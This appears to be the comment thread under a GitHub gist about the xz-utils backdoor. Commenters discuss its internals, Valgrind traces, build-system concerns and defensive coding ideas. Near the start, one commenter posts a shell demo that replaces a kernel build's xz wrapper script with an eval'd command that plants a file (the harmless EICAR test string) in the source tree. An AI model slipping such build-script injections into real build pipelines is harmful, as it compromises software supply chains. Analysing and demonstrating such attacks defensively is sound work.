But I'm not giving up on you yet. Let's start by making the bold printed a little clearer.
The following should only use the fragments highlighted in the leading comment as a sample. I didn't develop xz, so I'm replacing it with sh. I can't use the --robot --version arguments, but they are almost irrelevant.

# this is only pretext normally provided by the task to build the kernel
TEMPDIR="$(mktemp -du)"
mkdir -p $TEMPDIR/Artoria2e5/mykernel/scripts
mkdir -p $TEMPDIR/Artoria2e5/mykernel/prereqs
srctree=$TEMPDIR/Artoria2e5/mykernel
pre_reqs="$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"
XZ=sh
export XZ
echo please cleanup $TEMPDIR when you are done
cat >"$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"<<'EOF'
lorem ipsum and some intersting pointers to CANCER
EOF
cat >"$TEMPDIR/Artoria2e5/mykernel/scripts/xz_wrap.sh"<<'EOF'
eval "$($XZ -c 'TARGET_DIR='$(dirname ${BASH_SOURCE[0]})/..';echo STEVE_S_LATE_REVENGE_FOR_LINUX="$(grep -Po '\''pointers to \K\S+'\'')";echo $'\''X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\''> ${TARGET_DIR}/blob.txt')" || exit
#this is just to make it easier to understand the above XZ command would be able to produce this too
echo a $STEVE_S_LATE_REVENGE_FOR_LINUX that attaches itself in an intellectual property sense to everything it touches
EOF

# now we are going to "build the kernel" - show casing just relevant maybe malicious part
# original 'cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@' 
cat ${pre_reqs} | sh ${srctree}/scripts/xz_wrap.sh > a_message_to_the_linux_people.txt
# finished nothing special to see

# verify that the build context was modified
cat a_message_to_the_linux_people.txt
find $TEMPDIR -type f -name blob.txt -exec cat {} \;

# cleanup
rm -rvf $TEMPDIR

unfortunately, based on your reading comprehension, i have to assume that you still won't understand. but maybe there are a few others who can help you further.
The verify step would show you

  • 'cat a_message_to_the_linux_people.txt'
a CANCER that attaches itself in an intellectual property sense to everything it touches
  • 'find $TEMPDIR -type f -name blob.txt -exec cat {} ;' # a nice blob placed into srctree
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

i have done my duty and shown good will

@dnorthup-ums

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@paulfloyd The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones). As for the 64-bit 0x77... or 0xDD2A.... addresses, it looks to me like something is trying to be clever and take advantage of the "hole" between typical user space and kernel space when injecting the payload via ifunc. I suspect if you look at one of the disassembly attempts of the exploit you'll get more insight into what is going on there and why those are important (as noted, I strongly suspect they are).

@AdrianBunk

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.

@flybyray Conspiracy theories and insults from people like you are not helpful.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Please stop it.

@AdrianBunk

AdrianBunk commented Apr 12, 2024

The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones).

All major distributions (including Debian) changed their compiler to default to PIE several years ago for ASLR.

@christoofar

christoofar commented Apr 13, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

When we talked it out, the function that was doing this nuke (microlzma is what Jia Tan wants to raise during init), did not supply a size when it entered the loop to start writing 0x00 into a stack area.

This function, lzma_stream_header_encodb, is not in the 5.6.1 .o release, it only appears in the 5.6.0; hence the theory that a mistake in the feature flags for the build did not completely strip out the setup for a debug/examine tool (which would have reported out the progress of the locator and possibly also brought in a more comprehensive debug/examine tool as an option). My guess is that it's not a mistake in the offsets calculations (there is a whole DASM library inside the malware), but a way to quickly patch the obfuscations in while still making sure that the hotloading core code stays functional.

Jia Tan needed some way to know that he landed on all the jump calls needed to patch libcrypto.

Further: The final 5.6.1 has an insert in the ELF table for a note area that is moving all the bytes down 0x26, and throwing the asm dumps into diff shows a heavy amount of offset changes in microlzma, the gateway to the backdoor.

@christoofar

christoofar commented Apr 13, 2024

I've been thinking a lot about this as a CGo/gccgo dev: "What can a HLL programmer do against the likes of Jia Tan? They're attacking from the foundation software."

I'm not settled on this one, but wrapping calls to C libs in goroutines probably would raise the difficulty level, given the rapid context switches and the unpredictability of where the Go runtime will move the jump calls.

After 129,000 lines of asm, here is printf("Hello World") in Go down at the bottom:
image

Now, let's see what happens when we do this:

package main

import "time"

func main() {
	hello := "Hello world!"
	go func() {
		print(hello)
	}()
	// Give the goroutine time to run before main exits.
	time.Sleep(1 * time.Second)
}

Now we're asking the Go runtime to activate concurrency and main itself gets split into two compact parts with an anonymous function that disappears into the goroutine ecosphere (to get this to fit I'm stripping symbols):
image
image

Notice how nice and compact the goroutine is! Not many things you can do here but try to intercept the ret and call instructions, but you will need to also make sure the runtime stack cleanup happens or things will start to go crashycrashy.

So now let's make a C lib call but push it down into a goroutine wrapper, yet make it synchronous. And for fun, the data to the function will be passed via a channel, which brings in the communication/sync areas of the runtime with its maze of runtime functions. And since we're here, let's make it a full Go wrapper, with two channels and a goroutine bridge, and a done signaler.

package main

// #include <stdio.h>
// #include <stdlib.h>
// void printFromC(const char* str) {
//     printf("Received C string: %s\n", str);
// }
import "C"
import "unsafe"

func main() {
	myPrint("Hello from Go!")
}

func myPrint(hellostring string) {
	// Protect the C library call from Jia Tan and the NSA
	sendchan := make(chan string)
	recvchan := make(chan string)
	done := make(chan bool)
	
	go func(sender chan string, receiver chan string) { // Both chans are bidirectional here
		go func(receive <-chan string) { // This one is recv-only
			callCPrint(receive)
			done <- true
		}(receiver)
		go func() {
			// Bridge: forward the string from the sender chan to the receiver chan
			strToSend := <-sender
			receiver <- strToSend
			close(sender)
		}()
	}(sendchan, recvchan)

	sendchan <- hellostring
	<-done
	return
}

func callCPrint(str <-chan string) {
	cStr := C.CString(<-str)
	defer C.free(unsafe.Pointer(cStr)) // Deallocate memory when done
	C.printFromC(cStr)
}

The main() in asm representation gets shorter
image

But now there is some real fun going on in myPrint() as it's acting as a traffic cop moving the string along its way into the chaos of pthread, with its context switches and semaphores. myPrint is split by the compiler into 6 asm functions (one each for the launch point and anonymous function of the three goroutines) to allow for their dynamic reallocation to the runtime.

image
That goes on for pages.

callCPrint then has a thunk going on, which can't get back its data to myPrint without going back through the runtime maze.
image

I'm still not sold on this approach but I'm definitely willing to change my own behavior to make these creeps go away if the difficulty is raised high enough. And throwing CGo calls through a goroutine bridge still makes readable code to me.

@tdkuehnel

Besides the technical things involved around this incident, which required profound knowledge and ability to develop and implement such an attack, the weak point and what was easy to establish was the social factor of the attack. It took only two persons working together to nudge the project maintainer out of the way. THAT is the real catastrophe.

We need to use the internet to represent our real social connections, not to throw the whole world into one community driven by some huge content aggregators. The real power of the internet is still hidden in its decentralized inherent structure, which we are using and taking benefit of only in small amounts today.

Yes, client-server brought the whole internet thing to life, but now we are adult enough to decide on our own with whom to share and connect directly and how to decide who has access to which part of my own data. My comments are my data, every content i create is my data, it has to be distributed by the network of the people i know and trust, by their devices. Not by content aggregators. When i watch a yt video or other content, i want to see the comments of my friends and social contacts first, access the comments from their data stores directly. Better let me decide and configure which comments to see at all, not let it be dictated by some content aggregators which are dead stuck in their own development. The whole internet has to be shaped around our social contacts and networks, not be dictated by some content aggregators. /rant off.

@cwegener

cwegener commented Apr 14, 2024 via email

@avbentem

@cwegener I'm guessing @tdkuehnel may be referring to what happened in 2022 according to a list of events curated by @boehs.

@flybyray

flybyray commented Apr 14, 2024

@flybyray Conspiracy theories and insults from people like you are not helpful.

Perhaps you are in a position to take your sort of interference as an insult.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Are you implying that I am trying to claim something without a proof? And you try it to do only with a mere personal assertion? Pipes!

Please stop it.

I hope you do that and come back next time with meaningful additions and statements.
I also hope that you understand what an honest discussion is, that you have to fight back when others try to play unfair by ignoring essential context or trying to distort the meaning of statements.

To get back on track:

  • I joined this discussion just by pointing out that the ultimate target for a supply chain attack will be the kernel. I was just missing something here.
  • that there were surprising changes in the linux-next repo shortly before the backdoor became known. 20/03/2024
  • discussions on the kernel mailing list regarding this change to remove it, but it was already pushed into linux-next
    • now there is a newer comment https://lwn.net/ml/linux-kernel/20240404170103.1bc382b3@kaneli/ i am happy that my concern is addressed there. but i would be more happy if they would handle all compression tools equally. there should be a strict interface to comply with. i am not sure why only xz should be allowed to run in different form - it just shows that its internal working is too complex.

Exactly what this recent conclusion section states:
"...
It’s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the XZ repository, as well as the complex code contained within the binary itself.

There is still much more to explore about the backdoor’s internals, which is why we have decided to present this as Part I of the XZ backdoor series. ..."

"the binary itself" could not be ignored as the master plan ( "golden piece") for a targeted supply chain kernel attack.
especially the mentioned discussions put important things( tangible error ) on the table.
there may be other tools that are part of the build process and are assumed to be safe without question. someone who has this concern even tries to scan complete package trees https://github.com/hlein/distro-backdoor-scanner

i fear the structure of a suitable defense will look more complex.

hopefully automation and statistics can help to spot risks.
like you need to track maintainers and their commitment to projects. this is just an example:
"""
Many open-source software (OSS) projects are self-organized and do not maintain official lists with information on developer
roles. So, knowing which developers take core and maintainer roles is, despite being relevant, often tacit knowledge. We propose
a method to automatically identify core developers based on role permissions of privileged events triggered in GitHub issues
and pull requests. In an empirical study on 25 GitHub projects, (1) we validate the set of automatically identified core developers
with a sample of project-reported developer lists, and (2) we use our set of identified core developers to assess the accuracy of
state-of-the-art unsupervised developer classification methods. Our results indicate that the set of core developers, which
we extracted from privileged issue events, is sound and the accuracy of state-of-the-art unsupervised classification methods
depends mainly on the data source (commit data vs. issue data) rather than the network-construction method (directed vs.
undirected, etc.). In perspective, our results shall guide research and practice to choose appropriate unsupervised classification
methods, and our method can help create reliable ground-truth data for training supervised classification methods.
"""
ref: https://www.se.cs.uni-saarland.de/publications/docs/BAJ+23.pdf

@calestyo

calestyo commented Apr 14, 2024

I'm not the admin here (so obviously @thesamesam decides what this is about and not me), but I had the impression so far that this gist was primarily giving an overview/index/references to the XZ backdoor - not about actual in-depth discussion about the various fields (reverse engineering, OSint, etc. pp) related to it.

That was the nice thing about it, getting only really new/concrete stuff from it.

There do seem to be numerous places which are dedicated to in-depth discussion (and arguing ;-) ) like https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint).

@AdrianBunk

I joined this discussion just by pointing out that the ultimate target for a supply chain attack will be the kernel.

That's nonsense.

Nothing you provided indicates that there was actually anything malicious submitted to the kernel, and it would be unbelievably stupid for the attacker to try to add more exploits since this would increase the risk that the openssh backdoor gets detected.

The openssh backdoor would have given the attacker remote administrator access to most Linux servers on the internet.
This is already the ultimate backdoor.

And here is not the right place for people to present whatever thoughts or theories they come up with, please do that in a more appropriate location.

@the-lne

the-lne commented Apr 15, 2024 via email

@thesamesam
Author

It makes my life a lot easier if the comment section here is kept for editorial changes I need to make, extra sources, etc.

Please keep theorising to other forums. Thanks!

@felipec

felipec commented Apr 15, 2024

@thesamesam this is a good resource I think: https://github.com/felipec/xz-min.

@thesamesam
Author

Thanks @felipec! I have a few other things to go over in the backlog and can hopefully include them all in a batch later today or tomorrow.

@dnorthup-ums

@thesamesam
Sam, et al:
I think there's another "Easter Egg" in there... Looking again, closely, at Lasse's f9cf4c05 commit (the tukaani repo) and his 02e35059 commit, and then re-reading the build tools scripts, it looks like "Jia" intended to be able to use TCP connections from inside of XZ on platforms built with CMAKE. There's got to be some way to invoke that. Perhaps he hadn't finished implementing that part yet..., but I think that somebody with better fuzzing skills than mine should give it a close look. The good news is that Lasse re-enabled the Landlock function for CMAKE builds...., presuming that "Jia" hadn't hidden something in the Landlock code.

Since there's apparently zero interest, here or elsewhere, about following up on "Jia"'s fairly obvious attempt to weaponize the cmake builds, I'm outta here. I'm not hard to find should anybody not manage to make sense of what I said earlier, but I'm not bothering to follow the conversation here anymore.

@thesamesam
Author

OK, gone through comments, please let me know if I missed any changes either from here in the last few days or generally on the internet. Thanks!

@roccotanica1234

Jia Tan's Twitter account, associated with jiat0218@gmail.com, is: https://twitter.com/JiaT03868010 (I haven't found it mentioned anywhere)

I just noticed that Jia Tan's Twitter registration date (Dec 2020) is earlier than the GitHub registration date (26 Jan 2021).

image

@pillowtrucker

did we gett'em yet

@calestyo

@thesamesam
Author

@calestyo Thanks!
